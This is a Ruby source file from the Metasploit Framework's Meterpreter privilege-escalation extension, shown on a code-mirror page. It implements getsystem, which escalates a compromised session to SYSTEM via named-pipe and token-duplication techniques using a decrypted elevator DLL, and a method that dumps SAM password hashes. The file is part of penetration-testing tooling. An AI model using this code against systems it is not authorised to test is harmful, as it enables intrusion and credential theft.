CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb
Views: 1904
1
# -*- coding: binary -*-

2


3
require 'rex/post/meterpreter/extensions/priv/tlv'

4
require 'rex/post/meterpreter/extensions/priv/command_ids'

5
require 'rex/post/meterpreter/extensions/priv/passwd'

6
require 'rex/post/meterpreter/extensions/priv/fs'

7


8
module Rex

9
module Post

10
module Meterpreter

11
module Extensions

12
module Priv

13


14
###

15
#

16
# This meterpreter extensions a privilege escalation interface that is capable

17
# of doing things like dumping password hashes and performing local

18
# exploitation.

19
#

20
###

21
class Priv < Extension

22


23
  def self.extension_id

24
    EXTENSION_ID_PRIV

25
  end

26


27
  TECHNIQUE = {

28
    any: 0,

29
    named_pipe: 1,

30
    named_pipe_2: 2,

31
    token_dup: 3,

32
    named_pipe_rpcss: 4,

33
    named_pipe_print_spooler: 5,

34
    named_pipe_efs: 6

35
  }.freeze

36


37
  #

38
  # Initializes the privilege escalation extension.

39
  #

40
  def initialize(client)

41
    super(client, 'priv')

42


43
    client.register_extension_aliases(

44
      [

45
        {

46
          'name' => 'priv',

47
          'ext'  => self

48
        },

49
      ])

50


51
    # Initialize sub-classes

52
    self.fs = Fs.new(client)

53
  end

54


55
  #

56
  # Attempt to elevate the meterpreter to Local SYSTEM

57
  #

58
  def getsystem(technique=TECHNIQUE[:any])

59
    request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM)

60


61
    # All three (that's #1, #2, #3 and *any* / #0) of the service-based techniques need a service name parameter

62
    if [TECHNIQUE[:any], TECHNIQUE[:named_pipe], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)

63
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6))

64
    end

65


66
    # We only need the elevate DLL for when we're invoking the TokenDup or

67
    # NamedPipe2 method, which we'll only use if required (ie. trying all or

68
    # when that method is asked for explicitly)

69
    if [TECHNIQUE[:any], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique)

70
      elevator_path = nil

71
      client.binary_suffix.each { |s|

72
        elevator_path = MetasploitPayloads.meterpreter_path('elevator', s)

73
        if !elevator_path.nil?

74
          break

75
        end

76
      }

77
      if elevator_path.nil?

78
        elevators = ''

79
        client.binary_suffix.each { |s|

80
          elevators << "elevator.#{s}, "

81
        }

82
        raise RuntimeError, "#{elevators.chomp(', ')} not found", caller

83
      end

84


85
      encrypted_elevator_data = ::File.binread(elevator_path)

86
      elevator_data = ::MetasploitPayloads::Crypto.decrypt(ciphertext: encrypted_elevator_data)

87


88
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data)

89
      request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length)

90
    end

91


92
    request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique)

93


94
    # as some service routines can be slow we bump up the timeout to 90 seconds

95
    response = client.send_request(request, 90)

96


97
    technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE)

98


99
    if(response.result == 0 and technique != nil)

100
      client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')

101
      client.update_session_info

102
      client.sys.config.getprivs

103
      if client.framework.db and client.framework.db.active

104
        client.framework.db.report_note(

105
          :host => client.sock.peerhost,

106
          :workspace => client.framework.db.workspace,

107
          :type => 'meterpreter.getsystem',

108
          :data => {:technique => technique}

109
        ) rescue nil

110
      end

111
      return [ true, technique ]

112
    end

113


114
    return [ false, 0 ]

115
  end

116


117
  #

118
  # Returns an array of SAM hashes from the remote machine.

119
  #

120
  def sam_hashes

121
    # This can take a long long time for large domain controls, bump the timeout to one hour

122
    response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600)

123


124
    response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash|

125
      SamUser.new(hash)

126
    }

127
  end

128


129
  #

130
  # Modifying privileged file system attributes.

131
  #

132
  attr_reader :fs

133


134
protected

135


136
  attr_writer :fs # :nodoc:

137


138
end

139


140
end; end; end; end; end

141


142


143